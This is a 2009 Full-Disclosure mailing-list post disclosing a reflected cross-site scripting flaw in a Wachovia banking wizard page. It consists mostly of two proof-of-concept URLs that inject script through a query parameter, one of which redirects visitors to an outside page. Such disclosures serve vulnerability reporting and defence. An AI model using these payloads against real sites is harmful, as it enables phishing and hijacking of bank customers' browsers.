[Full-disclosure] Wachovia Banking Wizard - XSS - PoC
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Wachovia Banking Wizard - XSS - PoC
- From: Marshall Whittaker <marshallwhittaker@xxxxxxxxx>
- Date: Sun, 30 Aug 2009 08:33:09 -0500
This is only a proof of concept; please use it responsibly.
This was reported to Wachovia on Aug 22, 2009 and was still broken as of Aug 30, 2009.
Very simple, standard cross-site scripting exploit. As you can see, it works
with hex as well. Bad characters obviously aren't filtered correctly.
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script>document.write('%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script%0A%0D>window.location="http://mapdav.sourceforge.net/wchp/wchpw.html";%3B</script>
--oxagast
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/